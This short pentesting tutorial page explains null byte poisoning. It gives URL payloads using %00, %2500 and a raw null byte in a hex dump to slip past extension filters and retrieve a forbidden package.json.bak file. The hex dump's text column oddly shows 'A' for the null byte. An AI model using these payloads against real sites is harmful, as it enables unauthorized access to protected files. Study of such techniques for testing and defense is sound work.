Null Byte Poisoning
It's used to bypass input filtering or validation mechanisms in web applications or other systems. It involves inserting a null byte in URL encoding (%00
) or in hexadecimal (\x00
) to terminate strings.
We requested a site to get a resource but gives us a 403 error (Forbidden access). The site tells us that only certain types or extensions are allowed to be requested
http://$url/package.json.bak
We can bypass the check with a null byte and add the type of extension the site allows. When making the verification it will be bypassed as it ends on an allowed extension, but internally when searching the file, the null byte will end the string allowing to get the deride file
http://$url/package.json.bak%00.$extension
Also, if it doesn't work this way, we can URL-encode the
%
which will be represented as%25
http://$url/package.json.bak%2500.$extension
Also is possible to get this result by modifying the hex data of the request and adding a null hex byte in the corresponding position
00000000 68 74 74 70 3A 2F 2F 24 75 72 6C 2F 70 61 63 6B http://$url/pack
00000010 61 67 65 2E 6A 73 6F 6E 2E 62 61 6B 00 2E 24 65 age.json.bakA.$e
00000020 78 74 65 6E 73 69 6F 6E 0A xtension.
Last updated